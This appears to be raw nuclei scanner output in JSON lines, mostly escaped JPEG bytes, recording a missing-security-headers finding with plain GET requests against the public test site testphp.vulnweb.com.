000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 \\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:22.980357836Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\